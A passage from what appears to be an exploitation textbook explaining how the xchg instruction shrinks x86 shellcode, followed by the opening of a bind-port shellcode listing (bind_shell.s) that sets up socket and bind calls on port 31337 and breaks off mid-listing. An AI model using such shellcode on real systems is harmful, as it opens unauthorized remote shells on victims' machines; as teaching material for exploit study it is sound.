Graphics Programs Reference
In-Depth Information
The first two instructions before the loop can be shortened with the
xchg
(exchange) instruction. This instruction swaps the values between the source
and destination operands:
Instruction Description
xchg <dest>, <source>
Exchange the values between the two operands.
This single instruction can replace both of the following instructions,
which take up four bytes:
89 C3 mov ebx,eax
31 C0 xor eax,eax
The EAX register needs to be zeroed to clear only the upper three bytes
of the register, and EBX already has these upper bytes cleared. So swapping
the values between EAX and EBX will kill two birds with one stone, reduc-
ing the size to the following single-byte instruction:
93 xchg eax,ebx
Since the
xchg
instruction is actually smaller than a
mov
instruction between
two registers, it can be used to shrink shellcode in other places. Naturally, this
only works in situations where the source operand's register doesn't matter.
The following version of the bind port shellcode uses the exchange instruction
to shave a few more bytes off its size.
bind_shell.s
BITS 32
; s = socket(2, 1, 0)
push BYTE 0x66 ; socketcall is syscall #102 (0x66).
pop eax
cdq ; Zero out edx for use as a null DWORD later.
xor ebx, ebx ; Ebx is the type of socketcall.
inc ebx ; 1 = SYS_SOCKET = socket()
push edx ; Build arg array: { protocol = 0,
push BYTE 0x1 ; (in reverse) SOCK_STREAM = 1,
push BYTE 0x2 ; AF_INET = 2 }
mov ecx, esp ; ecx = ptr to argument array
int 0x80 ; After syscall, eax has socket file descriptor.
xchg esi, eax ; Save socket FD in esi for later.
; bind(s, [2, 31337, 0], 16)
push BYTE 0x66 ; socketcall (syscall #102)
pop eax
inc ebx ; ebx = 2 = SYS_BIND = bind()
